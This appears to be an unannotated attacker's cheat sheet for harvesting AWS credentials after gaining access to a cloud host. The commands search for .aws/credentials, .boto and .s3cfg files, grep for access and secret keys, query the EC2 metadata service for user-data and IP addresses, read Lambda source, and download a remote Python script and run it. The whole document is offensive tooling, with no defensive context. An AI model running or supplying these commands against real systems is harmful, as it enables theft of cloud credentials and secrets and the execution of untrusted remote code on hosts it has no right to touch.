export

sudo find / -iname "credentials"

find / -iname "aws"
find / -iname ".s3cfg"
find / -iname ".fog"
find / -iname ".boto"
find / -iname "aws"
cat ~/.aws/config
cat ~/.aws/credentials
cat ~/.elasticbeanstalk/aws_credential_file

find /root -name "*" -exec grep -H -i "access_key " {} \;
find /root -name "*" -exec grep -H -i "secret_key" {} \;

find /root -name "*.py" -exec grep -H -i "boto3" {} \;
find /root -name "*.py" -exec grep -H -i "boto3.client(" {} \;
find /root -name "*.py" -exec grep -H -i "boto" {} \;
find /root -name "*.py" -exec grep -H -i "boto.client" {} \;

wget -q -O - http://169.254.169.254/latest/meta-data/instance-id

wget -q -O - http://169.254.169.254/latest/user-data

echo base64string | base64 --decode

echo IyEvYmluL2Jhc2gKeXVtIHVwZGF0ZSAteQpzZXJ2aWNlIGh0dHBkIHN0YXJ0RwZCBvbg== | base64 --decode

wget -q -O - http://169.254.169.254/latest/public-ipv4

wget https://gist.githubusercontent.com/TweekFawkes/9da5ccb9257420aa134887b4afa19b87/raw/00101e70b14b9f3c2f9e6269d2b6025da2d8f794/soMeta.py
python soMeta.py

sudo find / -name "*.php" -exec grep -H -i "secret" {} \;

ls /var/task
cat /var/task/lambda_function.py
